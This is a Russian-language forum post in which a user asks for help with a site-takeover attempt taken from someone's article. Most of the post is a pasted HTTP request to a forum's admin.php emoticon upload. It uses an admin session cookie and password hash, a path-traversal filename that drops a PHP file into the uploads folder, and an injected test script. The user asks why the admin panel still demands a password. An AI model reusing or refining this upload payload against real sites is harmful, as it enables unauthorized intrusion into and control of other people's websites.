По пробовал залить в upload,для этого воспользовался твоей статьей захват сайтов и примером модифицированного запроса:
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.p....ode=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script&quot %>
-----------------------------7d43942c405bc--

Ну естественно название сайта и хэш сменил, но после отправки если нажать кнопку show body in browser то открывается окно и просят ввести пароль для входа в админку !!! Я не знаю почему так получается ведь хэш то правильный у меня указан !!! И еще вот эта строчка

<% echo("Hello from injected PHP script&quot %>
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???